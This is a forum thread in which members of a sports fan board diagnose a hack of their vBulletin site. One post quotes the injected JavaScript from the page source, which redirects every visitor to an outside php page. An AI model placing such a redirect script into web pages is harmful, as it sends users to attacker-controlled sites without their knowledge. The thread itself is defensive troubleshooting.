• Welcome to OGBoards 10.0, keep in mind that we will be making LOTS of changes to smooth out the experience here and make it as close as possible functionally to the old software, but feel free to drop suggestions or requests in the Tech Support subforum!

Hacked

RacerDeac

#iwasright #rjlies
Joined
Apr 9, 2011
Messages
16,689
Reaction score
1,744
I think the site has been hacked with a redirect. I get redirected to another site when accessing via my laptop or mobile browser. Only able to access via mobile app.
 
http://www.phlebotomyguide.net/

That's the URL to search for in the site code.
 
Looks as though the hacker is still logged on... as "admin"

adminhacker.jpg
 
Looks as though the hacker is still logged on... as "admin"

The hack is at the server/code level rather than from within the forum software. Probably a FTP hack unless there's some sort of strange VBulletin vulnerability that allows you to insert code onto the server.
 
Last edited:
The hack is at the server/code level rather than from within the forum software. Probably a FTP hack unless there's some sort of strange VBulletin vulnerability that allows you to insert code onto the server.

Yea, that's where they stuck the JS hack. But if the admin password was weak or default, they likely got logged in to Vbulletin as well. I've never seen "admin" listed as a logged in user.
 
I think it's a VBulletin vulnerability.. Look where the script appears in a page source:

<title>Old Gold and Black Forums - Powered by vBulletin</title>
</head>
<body>
<!-- logo -->
<script type="text/javascript">
window.location = "http://phlebotomyguide.net/ww.php"
</script>

<a name="top"></a>
<!-- <table border="0" width="100%" cellpadding="0" cellspacing="0" align="center">
<tr>
<td align="center"><a href="index.php"><img src="images/misc/Logo.png" border="0" alt="Old Gold and Black Forums" /></a></td>


</tr>
</table> -->
<div style="text-align: center;"><a href="index.php"><img src="images/misc/Logo.png" border="0" alt="Old Gold and Black Forums" style="margin: 0 auto; padding: 0" /></a></div>
<!-- /logo -->
 
Yea, that's where they stuck the JS hack. But if the admin password was weak or default, they likely got logged in to Vbulletin as well. I've never seen "admin" listed as a logged in user.

I just assumed that "admin" had logged in because there was a problem with the site.
 
I think it's a VBulletin vulnerability.. Look where the script appears in a page source:

Yeah, but that would be easy enough to insert via FTP. I'm not sure if VBulletin really has much ability to insert code via it's backend interface, but I haven't used it in a while.
 
I just assumed that "admin" had logged in because there was a problem with the site.

Not sure if it was me logging in as admin, or the hacker. Either way, all the passwords have been changed. Any idea where this code might be? I see it in our page source. We are drawing blanks.
 
Yeah, but that would be easy enough to insert via FTP. I'm not sure if VBulletin really has much ability to insert code via it's backend interface, but I haven't used it in a while.

I would honestly hope they don't use FTP to work on this site. Too insecure. Better to use SSL or SFTP... Oh well though.
 
I would honestly hope they don't use FTP to work on this site. Too insecure. Better to use SSL or SFTP... Oh well though.

Yeah, I use FTP as a verb to cover moving files up and down. I'll specify next time. :thumbsup:
 
Back
Top